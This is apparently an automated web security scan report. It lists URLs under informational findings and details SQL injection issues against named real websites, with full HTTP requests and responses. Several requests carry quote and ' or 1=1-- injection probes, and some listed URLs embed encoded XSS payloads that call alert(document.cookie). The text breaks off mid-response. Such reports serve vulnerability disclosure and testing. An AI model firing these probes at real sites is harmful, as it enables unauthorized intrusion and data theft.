12.57. http://tools.google.com/service/update2

12.58. http://translate.googleapis.com/translate_a/l

12.59. https://twitter.com/oauth/authenticate

12.60. http://widgets.digg.com/buttons/count

12.61. http://www.adfusion.com/Adfusion.PartnerSite/categoryhtml.aspx

12.62. http://www.atlanticyachtandship.com/about_us.html

12.63. http://www.capgemini.com/

12.64. http://www.cgisecurity.com/lib/WH-WhitePaper_XST_ebook.pdf

12.65. http://www.freefind.com/

12.66. http://www.fusionbot.com/

12.67. https://www.fusionbot.com/login.asp

12.68. http://www.homelandstupidity.us/

12.69. http://www.kingdee.com/en/

12.70. http://www.leadlife.com/analytics/lla.aspx

12.71. http://www.opengroup.org/togaf/

12.72. http://www.sti-seoservices.com/

12.73. http://www.sti-world.com/

12.74. http://www.stisoftware.net/

12.75. http://www.winamp.com/media-player/en

12.76. http://www.wolframalpha.com/input/

12.77. http://www.zoho.com/company.html

12.78. http://www1.wolframalpha.com/Calculate/MSP/MSP108819ecf93a845dci5i000032708gihb0c32g77

12.79. http://www4d.wolframalpha.com/Calculate/MSP/MSP485119ecg7ic1a16ifci00004c77aigbe60ad8d6

12.80. http://xss.cx/

13. Cacheable HTTPS response

13.1. https://accounts.zoho.com/login

13.2. https://accounts.zoho.com/register

13.3. https://duckduckgo.com/

13.4. https://duckduckgo.com/Electronic_Frontier_Foundation

13.5. https://duckduckgo.com/HTTP_Secure

13.6. https://duckduckgo.com/HTTP_cookie

13.7. https://duckduckgo.com/IP_Address

13.8. https://duckduckgo.com/about.html

13.9. https://duckduckgo.com/bang.html

13.10. https://duckduckgo.com/e.js

13.11. https://duckduckgo.com/faq.html

13.12. https://duckduckgo.com/feedback.html

13.13. https://duckduckgo.com/goodies.html

13.14. https://duckduckgo.com/html

13.15. https://duckduckgo.com/html/

13.16. https://duckduckgo.com/lite

13.17. https://duckduckgo.com/opensearch.xml

13.18. https://duckduckgo.com/params.html

13.19. https://duckduckgo.com/privacy.html

13.20. https://duckduckgo.com/settings.html

13.21. https://event.on24.com/eventRegistration/EventLobbyServlet

13.22. https://login.live.com/pp1000/RDHelper_JS.srf

13.23. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login

13.24. https://login.oracle.com/sso_loginui/oracle.css

13.25. https://login.silverlight.net/

13.26. https://myprofile.oracle.com/EndUser/faces/profile/createUser.jspx

13.27. https://myprofile.oracle.com/EndUser/faces/profile/resetPassword.jspx

13.28. https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png

13.29. https://myprofile.oracle.com/EndUser/jscripts/s_code.js

13.30. https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js

13.31. https://profile.microsoft.com/RegSysProfileCenter/history.html

13.32. https://profile.microsoft.com/regsysprofilecenter/Footer.aspx

13.33. https://profile.microsoft.com/regsysprofilecenter/rps/LeftFrame.aspx

14. Multiple content types specified

14.1. http://bnxs.com/wp-includes/js/tinymce/tiny_mce.js

14.2. http://companypond.com/js/tiny_mce/tiny_mce.js

14.3. http://lilypad.cranberry.com/js/tiny_mce/tiny_mce.js

14.4. http://peoplepond.com/js/tiny_mce/tiny_mce.js

14.5. http://www.companypond.com/js/tiny_mce/tiny_mce.js

14.6. http://www.project-syndicate.org/javascript/tiny_mce/tiny_mce_gzip.php

15. HTML does not specify charset

15.1. http://ad.doubleclick.net/adi/N1260.gawkernetwork/B5173555.12

15.2. http://ad.doubleclick.net/adi/N2524.134426.0710433834321/B4169763.45

15.3. http://adam.companypond.com/peeps.php

15.4. http://alexgorbatchev.com/SyntaxHighlighter/donate.html

15.5. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0

15.6. http://api.qwerly.com/favicon.ico

15.7. http://bassett.in/

15.8. http://bassett.in/favicon.ico

15.9. http://bnxs.com/

15.10. http://bs.serving-sys.com/BurstingPipe/adServer.bs

15.11. http://capgeminicom.112.2o7.net/crossdomain.xml

15.12. http://cdn.at.atwola.com/_media/uac/tcode3.html

15.13. http://cdn.cloudscan.us/examples/plesk-reports/plesk-target.html

15.14. http://cloudscan.us/images/plesk-cover-1.jpg

15.15. http://dakwak.com/socket.html

15.16. http://dev.qwerly.com/favicon.ico

15.17. http://developer.klout.com/favicon.ico

15.18. http://donttrack.us/

15.19. http://duckduckgo.com/asciitable.html

15.20. http://duckduckgo.com/leaderboard.html

15.21. http://duckduckgo.com/post.html

15.22. http://duckduckgo.com/privacy.html

15.23. http://duckduckgo.com/search.html

15.24. http://duckduckgo.com/terms.html

15.25. http://duckduckgo.com/traffic.html

15.26. https://duckduckgo.com/privacy.html

15.27. http://eventreg.oracle.com/

15.28. http://fls.doubleclick.net/activityi

15.29. http://ioerror.us/

15.30. http://ioerror.us/bb2-support-key

15.31. http://js.bizographics.com/support/partner.html

15.32. http://load.exelator.com/load/net.php

15.33. http://mediacdn.disqus.com/1298421702/build/system/def.html

15.34. https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png

15.35. https://myprofile.oracle.com/EndUser/jscripts/s_code.js

15.36. https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js

15.37. http://now.eloqua.com/visitor/v200/svrGP.aspx

15.38. http://odb.outbrain.com/utils/ping.html

15.39. http://products.wolframalpha.com/api/

15.40. https://profile.microsoft.com/RegSysProfileCenter/history.html

15.41. http://seg.sharethis.com/getSegment.php

15.42. http://statistics.wibiya.com/SetToolbarLoad.php

15.43. http://tags.bluekai.com/site/918

15.44. http://techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/

15.45. http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html

15.46. http://tinyurl.com/

15.47. http://REDACTED/CNT/iview/302784236/direct

15.48. http://REDACTED/iaction/00asup_HomePortal_1

15.49. http://REDACTED/iaction/adoapn_AppNexusDemoActionTag_1

15.50. http://wd.sharethis.com/api/getCount.php

15.51. http://widgets.fbshare.me/files/fbshare.php

15.52. http://www.bloganol.com/wp-content/plugins/disqus-comment-system/xd_receiver.htm

15.53. http://www.cranberryventurepartners.com/

15.54. http://www.cranberryventurepartners.com/about-us.php

15.55. http://www.freefind.com/favicon.ico

15.56. http://www.fusionbot.com/

15.57. https://www.fusionbot.com/login.asp

15.58. http://www.google.com/enterprise/search/gsa.html

15.59. http://www.google.com/enterprise/search/gsa_website.html

15.60. http://www.montrealkiosk.com/directory.php

15.61. http://www.networksolutions.com/jsonBrowserInfo.do

15.62. http://www.networksolutions.com/jsonLogRedVenturesId.do

15.63. http://www.opengroup.org/architecture/togaf8-doc/arch/

15.64. http://www.opengroup.org/architecture/togaf8-doc/arch/toc2.html

15.65. http://www.oracle.com/go/index.html

15.66. http://www.sti-cs.com/CompanyProfile/include/img/spacer.gif

15.67. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24'/page-1/include/img/spacer.gif

15.68. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24/page-1/include/img/spacer.gif

15.69. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24c8e9b%253c%252fscript%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ea1374672bac/page-1/include/img/spacer.gif

15.70. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/id-24c8e9b%253c%252fscript%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ea1374672bac/page-1/include/img/spacer.gif

15.71. http://www.sti-cs.com/Portfolio/Trades-and-Exhibits/include/img/spacer.gif

15.72. http://www.sti-cs.com/favicon.ico

15.73. http://www.sti-cs.com/links/

15.74. http://www.sti-cs.com/rfq/

15.75. http://www.thedetroitbureau.com/

15.76. http://www.thedetroitbureau.com/2011/02/insurer-wants-fbi-to-pay-750000-for-crashed-ferrari/

15.77. http://www.thedetroitbureau.com/contact-us/

15.78. http://www.virtusa.com/alumni/

15.79. http://www.virtusa.com/careers/our-values.asp/

15.80. http://www.virtusa.com/careers/work-environment.asp/

15.81. http://www.virtusa.com/common/exitpage.asp

15.82. http://www.virtusa.com/contactus/sendmail.asp

15.83. http://www.virtusa.com/ftbu/images/favicon.ico

15.84. http://www.virtusa.com/ftbu/scripts/topnav/style.css

15.85. http://www.virtusa.com/practices/software-testing/tools-expertise.asp/

15.86. http://www.virtusa.com/sustainability/

15.87. http://www.wolframalpha.com/

15.88. http://xss.cx//examples/plesk-reports/plesk-xss.html

15.89. http://xss.cx/examples/html/xss-cross-site-scripting.boardreader.com.html

15.90. http://xss.cx/examples/plesk-reports/plesk-10.2.0.html

15.91. http://xss.cx/examples/plesk-reports/plesk-xss.html

15.92. http://xss.cx/hoyt-llc-research-vulnerability-advisories.html

16. HTML uses unrecognised charset

17. Content type incorrectly stated

17.1. http://a1.twimg.com/profile_images/657503744/twitterProfilePhoto_normal.jpg

17.2. http://altfarm.mediaplex.com/ad/js/3992-121072-16279-0

17.3. http://bs.serving-sys.com/BurstingPipe/adServer.bs

17.4. http://capgeminicom.112.2o7.net/crossdomain.xml

17.5. http://cdn.cloudscan.us/examples/exploits/watchmouse.txt

17.6. http://cloudscan.us/images/plesk-cover-1.jpg

17.7. http://corp.tap11.com/wp-content/themes/tap11/Geogtq-Rg.otf

17.8. http://cotweet.com/favicon.ico

17.9. http://dev.qwerly.com/favicon.ico

17.10. http://developer.klout.com/favicon.ico

17.11. http://discuss.zoho.com/getCustomFile.do

17.12. http://drh.img.digitalriver.com/DRHM/Storefront/Site/winamp/cm/images/favicon.ico

17.13. http://duck.co/jsp/i18nConstants.jsp

17.14. http://duckduckgo.com/iyp/6172532871

17.15. http://eventreg.oracle.com/favicon.ico

17.16. http://eventreg.oracle.com/webapps/events/ns/css/ers.css

17.17. http://ilove.klout.com/lkck.js

17.18. http://img.tweetimag.es/i/secsci_n

17.19. http://klout.com/public/images/partners.gif

17.20. http://landingpad.oracle.com/favicon.ico

17.21. http://lilypad-cdn.cranberry.com/img/fav/

17.22. http://liveintent.com/favicon.ico

17.23. https://login.live.com/pp1000/RDHelper_JS.srf

17.24. https://login.oracle.com/sso_loginui/oracle.css

17.25. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

17.26. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo

17.27. http://maps.gstatic.com/intl/en_us/mapfiles/closedhand_8_8.cur

17.28. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur

17.29. http://mediacdn.disqus.com/1298421702/fonts/disqus-webfont.woff

17.30. https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png

17.31. https://myprofile.oracle.com/EndUser/jscripts/s_code.js

17.32. https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js

17.33. http://now.eloqua.com/visitor/v200/svrGP.aspx

17.34. http://o.aolcdn.com/favicon.ico

17.35. http://ol5u8o2ka38be34j62ktnefji390jhro-a-fc-opensocial.googleusercontent.com/gadgets/makeRequest

17.36. http://photos4.meetupstatic.com/photos/event/b/6/d/highres_21062925.jpeg

17.37. http://rapportive.com/fonts/aller-lt-webfont.woff

17.38. http://rt.disqus.com/forums/realtime-cached.js

17.39. http://s3.amazonaws.com/getsatisfaction.com/images/transparent.gif

17.40. http://s3.amazonaws.com/getsatisfaction.com/javascripts/feedback-v2.js

17.41. http://s3.buysellads.com/1236348/32247-1280107285.gif

17.42. http://s3.buysellads.com/1236348/48698-1295754678.gif

17.43. http://s4.histats.com/stats/1257017.php

17.44. http://s4.histats.com/stats/e.php

17.45. http://server.iad.liveperson.net/hcp/html/mTag.js

17.46. http://shop.winamp.com/DRHM/store

17.47. http://static.fmpub.net/zone/1535

17.48. http://storify.com/klout/contest-winners-how-do-you-use-your-klout-for-good/record/view

17.49. http://syndication.jobthread.com/jt/syndication/page.php

17.50. http://techcrunch.com/2011/02/16/forbes-accused-of-link-spam-plays-dumb-but-forgets-to-delete-all-the-links/

17.51. http://track2.mybloglog.com/js/jsserv.php

17.52. http://track2.mybloglog.com/tr/urltrk.php

17.53. http://twitter.com/favorites/tap11.json

17.54. http://wd.sharethis.com/api/getCount.php

17.55. http://widgets.dzone.com/links/dwr/interface/LinkManager.js

17.56. http://www.adexchanger.com/favicon.ico

17.57. http://www.adexchanger.com/wp-admin/admin-ajax.php

17.58. http://www.atlanticyachtandship.com/favicon.ico

17.59. http://www.bloganol.com/wp-admin/admin-ajax.php

17.60. http://www.capgemini.com/img/skin/flag_2.png

17.61. http://www.facebook.com/extern/login_status.php

17.62. http://www.google.com/buzz/api/button.js

17.63. http://www.google.com/recaptcha/api/reload

17.64. http://www.google.com/search

17.65. http://www.kingdee.com/en/js/index/v2008/Index.js

17.66. http://www.montrealkiosk.com/directory.php

17.67. http://www.networksolutions.com/jsonBrowserInfo.do

17.68. http://www.networksolutions.com/jsonLogRedVenturesId.do

17.69. http://www.paperthin.com/dhtmlmenu_pgdefs_2.js

17.70. http://www.paperthin.com/dhtmlmenu_staticmenus_2.js

17.71. http://www.paperthin.com/products/dhtmlmenu_pgdefs_2.js

17.72. http://www.paperthin.com/products/dhtmlmenu_staticmenus_2.js

17.73. http://www.paperthin.com/solutions/dhtmlmenu_pgdefs_2.js

17.74. http://www.paperthin.com/solutions/dhtmlmenu_staticmenus_2.js

17.75. http://www.stumbleupon.com/hostedbadge.php

17.76. http://www.winamp.com/modules/getTweets.jsp

17.77. http://www4d.wolframalpha.com/input/recalculate.jsp

17.78. http://xss.cx/spark.css

18. Content type is not specified

18.1. https://accounts.zoho.com/favicon.ico

18.2. http://charts.aastocks.com/servlet/Charts

18.3. http://init.zopim.com/register

18.4. http://lc03.zopim.com/poll

18.5. http://lc03.zopim.com/send

18.6. http://lfov.net/favicon.ico

18.7. http://lfov.net/webrecorder/g/chimera.js

18.8. http://lfov.net/webrecorder/js/listen.js

18.9. https://login.oracle.com/pls/orasso/orasso.wwsso_app_admin.ls_login

18.10. http://tap11.com/css/Geogtq-Rg.otf

18.11. http://www.kingdee.com/favicon.ico



1. SQL injection  next
There are 32 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.



1.1. http://bad-behavior.ioerror.us/2011/01/05/bad-behavior-2-1-8/ [REST URL parameter 1]  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2011/01/05/bad-behavior-2-1-8/

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /2011'/01/05/bad-behavior-2-1-8/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:13:19 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761999+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Link: <http://bad-behavior.ioerror.us/?p=441>; rel=shortlink
Content-Length: 26787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p>
...[SNIP]...

1.2. http://bad-behavior.ioerror.us/2011/01/05/bad-behavior-2-1-8/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2011/01/05/bad-behavior-2-1-8/

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /2011/01'/05/bad-behavior-2-1-8/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:13:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762005+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Link: <http://bad-behavior.ioerror.us/?p=441>; rel=shortlink
Content-Length: 26787

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p>
...[SNIP]...

1.3. http://bad-behavior.ioerror.us/2011/01/05/bad-behavior-2-1-8/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /2011/01/05/bad-behavior-2-1-8/

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /2011/01/05'/bad-behavior-2-1-8/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:13:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762011+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Link: <http://bad-behavior.ioerror.us/?p=441>; rel=shortlink
Content-Length: 26788

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p>
...[SNIP]...

1.4. http://bad-behavior.ioerror.us/blog/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /blog/

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /blog'/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:12:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761978+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 72723

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p>
...[SNIP]...

1.5. http://bad-behavior.ioerror.us/category/bad-behavior/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /category/bad-behavior/

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /category/bad-behavior'/ HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:14:20 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762060+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 51665

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p>
...[SNIP]...

1.6. http://bad-behavior.ioerror.us/category/bad-behavior/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /category/bad-behavior/

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /category/bad-behavior/?1%2527=1 HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:13:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298762019+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Content-Length: 51670

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/xfn/11">
<meta property=
...[SNIP]...
2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p>
...[SNIP]...

1.7. http://bad-behavior.ioerror.us/feed/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /feed/

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /feed/?1%2527=1 HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:11:36 GMT
Content-Type: text/xml; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761895+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Last-Modified: Tue, 15 Feb 2011 06:24:42 GMT
ETag: "d0aa19c0e184cf0e188a04458920669c"
Content-Length: 41692

<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
   xmlns:content="http://purl.org/rss/1.0/modules/content/"
   xmlns:wfw="http://wellformedweb.org/CommentAPI/"
   xmlns:dc="http://purl.org/dc/elem
...[SNIP]...
2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p>
...[SNIP]...

1.8. http://bad-behavior.ioerror.us/feed/atom/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://bad-behavior.ioerror.us
Path:   /feed/atom/

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /feed/atom/?1%2527=1 HTTP/1.1
Host: bad-behavior.ioerror.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bb2_screener_=1298752932+173.193.214.243;

Response (redirected)

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 26 Feb 2011 23:11:42 GMT
Content-Type: application/atom+xml; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.3.4
Set-Cookie: bb2_screener_=1298761902+173.193.214.243; path=/
Vary: Cookie
X-Pingback: http://bad-behavior.ioerror.us/xmlrpc.php
Last-Modified: Tue, 15 Feb 2011 06:24:42 GMT
ETag: "d0aa19c0e184cf0e188a04458920669c"
Content-Length: 45367

<?xml version="1.0" encoding="UTF-8"?><feed
xmlns="http://www.w3.org/2005/Atom"
xmlns:thr="http://purl.org/syndication/thread/1.0"
xml:lang="en"
xml:base="http://bad-behavior.ioerror.us/wp-ato
...[SNIP]...
2.0 requires PHP 4.3 or later, and 2.1 requires PHP 5.2 or later (5.3 when running on Windows). Both releases require MySQL 4.0 or later when using a database. I have had code contributed which offers PostgreSQL support and I will be integrating this soon. Note that as 2.1 is still the development branch, requirements may change (up or down) as development progresses.</p>
...[SNIP]...

1.9. https://client.trafficshaping.com/_mint/ [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://client.trafficshaping.com
Path:   /_mint/

Request 1

GET /_mint/?js HTTP/1.1
Host: client.trafficshaping.com
Connection: keep-alive
Referer: https://client.trafficshaping.com/signin
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.1320435182'%20or%201%3d1--%20
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: csId=3922e3f116c2b714cb30cd7f3271fd2d; __switchTo5x=95; __utmz=50089699.1298824334.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); MintUnique=1; MintUniqueHour=1298822400; MintUniqueDay=1298793600; MintUniqueWeek=1298793600; MintUniqueMonth=1296547200; MintAcceptsCookies=1; __utma=50089699.1488621134.1298824334.1298824334.1298824334.1; __utmc=50089699; __utmb=50089699.3.10.1298824334; MintAcceptsCookies=1; __unam=d903aed-12e67f689b8-53801d6e-4

Response 1

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 16:52:18 GMT
Server: Apache/2.2.9 (Debian) PHP/5.3.3-0.dotdeb.1 with Suhosin-Patch mod_python/3.3.1 Python/2.5.2 mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.3.3-0.dotdeb.1
P3P: CP="NOI NID ADMa OUR IND COM NAV STA LOC"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 27 Feb 2011 16:52:18 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: MintAcceptsCookies=1; path=/; domain=.client.trafficshaping.com
Content-Length: 2003
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/javascript

var Mint = new Object();
Mint.save = function()
{
   var now        = new Date();
   var debug    = false; // this is set by php
   if (window.location.hash == '#Mint:Debug') { debug = true; };
   var path    = 'http://www.trafficshaping.com/_mint/?record&key=384148426b333545573532697a435238386b393231';
   path        = path.replace(/^https?:/, window.location.protocol);
   
   // Loop through the different plug-ins to assemble the query string
   for (var developer in this)
   {
       for (var plugin in this[developer])
       {
           if (this[developer][plugin] && this[developer][plugin].onsave)
           {
               path += this[developer][plugin].onsave();
           };
       };
   };
   // Slap the current time on there to prevent caching on subsequent page views in a few browsers
   path += '&'+now.getTime();
   
   // Redirect to the debug page
